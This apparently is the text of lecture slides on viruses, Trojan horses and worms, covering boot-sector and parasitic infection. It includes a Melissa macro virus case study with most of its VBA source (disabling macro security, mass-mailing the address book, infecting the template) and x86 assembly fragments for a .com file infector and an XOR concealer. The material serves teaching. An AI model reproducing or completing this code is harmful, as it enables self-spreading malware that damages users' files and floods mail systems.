Viruses, Trojan Horses, and Worms

Propagation of malicious codeMalicious indicates the potential to do damage.Usually classified by the type of propagation.Sometimes classified byPlatforms and mechanisms it requires to runE.g. macro viruses.Virus/Trojan/worm may not actually cause damages.

VirusesProgram or piece of code that will reproduce itself.Sometimes perform a particular action.Definition from RFC 1135A virus is a piece of code that inserts itself into a host, including operating systems, to propagate. It cannot run independently. It requires that its host program be run to activate it.

WormA worm is similar to a virus, but it does not locally reproduce.Propagates between systems only.Definition from RFC 1135A worm is a program that can run independently, will consume the resources of its host from within in order to maintain itself and can propagate a complete working version of itself on to other machines.

Macro VirusSometimes considered worms.Require a host program to process/run it in order for it to execute.Often written in VBA (Visual Basic for Application) for Word, Access, Excel, PowerPoint, and outlook etc.E.g. Melissa

Trojan HorsesCode disguised as benign programs, but behave in an unexpected, usually malicious manner.User needs to be convinced to accept/run them.E.g. Pokemon worm, which will display animated pictures of bouncing Pikachu on your screen while it e-mails itself to everyone in your address book and prepares to delete every files.

The Trojan horses initially appears as an e-mail with the title "Pikachu Pokemon" and the English message "Pikachu is your friend.The above picture is what the users see when executing pokemon.exe (its attachment). What they dont see is the application e-mailing itself and deleting files from the system.

Anatomy of a VirusTwo primary componentsPropagation mechanismPayloadPropagationMethod by which the virus spreads itself.Old days: single PC, transferred to other hosts by ways of floppy diskettes.Nowadays: internet.

Types of PropagationParasiticPropagates by being a parasite on other files.Attaching itself in some manner that still leaves the original file usable..com and .exe files of MS-DOSMacro virusBoot sector infectorsCopy themselves to the bootable portion of the hard (or floppy) disk.The virus gain control when the system is booted.

Normal boot procedureIt first goes through its usual POSTPower On Self TestBIOS (Basic Input/Output System) does what is referred to a as bootstrapChecking for a valid bootable diskFor a hard drive to be bootable, it must contain a Master Boot Record (MBR).Chuck of code that lies at the beginning of the hard drive.Understand the partition table.

The MBR code will look for a particular partition that is marked bootable (MSDOS fdisk: active), and then transfer control to the code.This code is known as the boot sector.Viruses have two opportunities to take control.Insert themselves into the MBR positionThey can gain control under all situationsAt the expense of having to deal with reading and booting via the partition table.

Insert themselves into the boot sector of a partitionBoot sector viruses tend to take the existing MBR or boot sector code, relocate it elsewhere, and then insert themselves into the record.When the system boots, they can do their things, and then transfer control the the relocated code that they replaced.

Multi-partiteRefers to viruses that can use multiple means of infection, such asMBRBoot sectorParasitic

PayloadRefers to what the virus does (besides propagation) once executed.Do nothingDo cute thingsMalicious damage such as delete your partition table.Some viruses have a particular trigger.DateNumber of successful infections

Smart viruses usually use infrequent trigger so that they have ample time to ensure they have properly propagated, before alerting the users.

Case Study I: MelissaMelissa works by infecting the Document_Open() macro of Microsoft word.Run immediately when the user opens the word files.Private Sub document_open()On Error Resume Next

Disable the macro security featuresIf System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER \Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else p$ = "clone" CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If

MAPI stands for Messaging API, a way for Windows applications to interface with various e-mail functionalities.

A way to tell if it has already infected the host.

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") "... by Kwyjibo" Then

To see if the application is outlookCompose of a list of the first 50 email addresses from the address bookIf UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo

Actually send emails

Wrap up

BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If p$ = "clone" System.PrivateProfileString("", "HKEY_CURRENT_USER \Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo" End If

Check to see if the active document and document template are infected.Infect it.

Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name "Melissa" Then If ADCL > 0 Then _ ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name = "Melissa" DoAD = True End If If NTI1.Name "Melissa" Then If NTCL > 0 Then _ NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT True And DoAD True Then GoTo CYA

Modifying the Document_Open() and Document_Close() function of the active document.Every new document created, upon closing or saving will run the Melissa worm.Saving the current document.

Case Study: .com VirusA .com virus may be divided into three parts.ReplicatorConcealerBomb (payload)

ReplicatorSpread the virus.

Copy rest of the code at the end.The uninfected fileThe virus code

Copy small portion of its code to the beginning of the file.Copy the second part of itself to the end of the file.

What do V1 and V2 do?V1 transfers control of the program to V2.

The code to do this is simple:

The value of Duh must be changed to reflect the length of the file that is infected.Dup = length of V1+ original size of the inflect file+ 256 (to account for the start position).E.g. if file size = 79 and V1=6 Dup = 6+79+256 = 341.Another approach

JMP FAR PTR Duh ; Takes four bytesDuh DW V2_Start ; Takes two bytesDB 1101001b ; Code for JMP ; (2 byte-displacement)Duh DW V2_Start - OFFSET Duh ; 2 byte displacement

V2 contains the rest of the code.The last part of V2 copies P1 over V1 (in memory) and then transfers the control to the beginning of the file (in memory). MOV SI, V2_START ; V2_START is a LABEL marking ; where V2 starts SUB SI, V1_LENGTH ; Go back to where P1 is stored MOV DI, 0100h ; All COM files are loaded @ ; CS:[100h] in memory MOV CX, V1_LENGTH ; Move CX bytes REP MOVSB ; DS:[SI] -> ES:[DI]

MOV DI, 0100h JMP DI

The code assume that P1 is located just before V2.It also assumes ES equals to CS. If these assumptions are false, we can change it accordingly. PUSH CS ; Store CS POP ES ; and move it to ES ; Note MOV ES, CS is not a ; valid instruction MOV SI, P1_START ; Move from wherever P1 is stored MOV DI, 0100h ; to CS:[100h] MOV CX, V1_LENGTH REP MOVSB

MOV DI, 0100h JMP DI

The code first moves CS into ES.Then sets the source pointer of MOVSB to where P1 is located.Note that the offset of P1 is 100h higher than the physical file location, as COM files are loaded starting from CS:[100h].Infecting .EXE file is much more complicated.

Replicator portionStepsFind a file to infect.Check if it is already infected.If so, go back to 1Infect it.If infected enough, quitOtherwise, go back to 1Finding a file to infectWrite a directory traversal procedureIssuing FINDFIRST and FINDNEXT calls

Once you find the file, open it and read the first few bytes. If they are the same as the first few bytes of V1, then the file is already infected.Infection should take the following steps:Change the file attributes to nothing.Save the file date/time stamps.Close the file.Open it again in read/write mode.Save P1 and append it to the end of the file.Copy V1 to the beginning, but change the offset which it JMPs to so it transfers control correctly.Append V2 to the end of the file.Restore file attributes /date/time.

mov ah,3Fh ; Read first three mov cx, 3 ; bytes of the file lea dx, [bp+offset buffer] ; to the buffer int 21h mov ax, 4202h ; SEEK from EOF xor cx, cx ; DX:CX = offset xor dx, dx ; Returns filesize int 21h ; in DX:AX sub ax, virus_size + 3 cmp word ptr [bp+offset buffer+1], ax jnz infect_it bomb_out: mov ah, 3Eh ; else close the file int 21h ; and go find anotherSample code to Check if the file has been infected.

ConcealerConceals the program from notice by the everyday user and virus scanner.A simple XOR encryption:encrypt_val db ?

decrypt:encrypt: mov ah, encrypt_val

mov cx, part_to_encrypt_end - part_to_encrypt_start mov si, part_to_encrypt_start mov di, si

xor_loop: lodsb ; DS:[SI] -> AL xor al, ah stosb ; AL -> ES:[DI] loop xor_loop ret

BombDoes all nasty things to annoy the user.Some possible bombsSystem slowdownEasily handled by trapping an interrupt and causing a delay when it activates.File deletion.Message Display.Killing/Replacing the partition table or boot sector of the hard drive.

Anti-virus Techniques Integrity/behavioral CheckersUse good OSUse virus scanner on computer and email-server.Use virus scannerDo not open attachments to emails.Frequent backups.

ReferenceKevin L. Poulsen, "Hack Proofing Your Network: Internet Tradecraft", Chapter 14, p.383 405Dark Angels Phunky Virus Writing Guide http://www.sirkussystem.com/virus.htmlIntroductionInstallment II: the replicator